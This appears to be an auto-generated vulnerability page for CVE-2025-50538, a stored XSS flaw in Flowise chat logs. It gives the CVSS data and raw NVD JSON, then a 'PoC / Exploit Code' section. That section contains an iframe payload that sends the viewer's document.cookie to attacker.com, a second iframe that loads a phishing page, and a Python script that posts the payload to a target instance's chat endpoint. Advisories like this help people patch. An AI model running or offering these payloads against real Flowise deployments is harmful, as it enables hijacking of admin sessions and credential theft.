Security Vulnerability Report
CVE-2025-50538 CVSS 8.2 HIGH

CVE-2025-50538

Published: 2025-10-06 02:15:40
Last Modified: 2025-10-07 17:03:13

Description

Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:* - VULNERABLE
Flowise < 3.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-50538 PoC: Stored XSS via IFRAME in Flowise Chat Log -->
<!--
Steps to reproduce:
1. Send a chat message containing the malicious IFRAME payload below
2. Wait for an admin to view the chat log in the admin panel
3. The malicious JavaScript will execute in the admin's browser context
-->

<!-- Malicious payload to inject via chat -->
<iframe src="javascript:alert('XSS-CVE-2025-50538');document.location='https://attacker.com/steal?c='+document.cookie" width="0" height="0" frameborder="0"></iframe>

<!-- Alternative payload using src attribute to load external content -->
<iframe src="https://attacker.com/phishing-page" style="width:100%;height:500px;border:none;"></iframe>

python
# Python exploit script for automated testing
import requests

TARGET_URL = "https://target-flowise-instance.com"
CHAT_ENDPOINT = f"{TARGET_URL}/api/v1/prediction/CHATFLOW_ID"

payload = {
    "question": "<iframe src='javascript:alert(document.cookie)' width='0' height='0'></iframe>"
}

response = requests.post(CHAT_ENDPOINT, json=payload)
print(f"Payload sent. Status: {response.status_code}")
print("When admin views chat logs, XSS will trigger.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50538", "sourceIdentifier": "[email protected]", "published": "2025-10-06T02:15:40.337", "lastModified": "2025-10-07T17:03:12.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.5", "matchCriteriaId": "BDD9A62B-1B22-4459-8EC5-4E6C0869BF26"}]}]}], "references": [{"url": "https://github.com/FlowiseAI/Flowise/pull/4905", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": 
"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}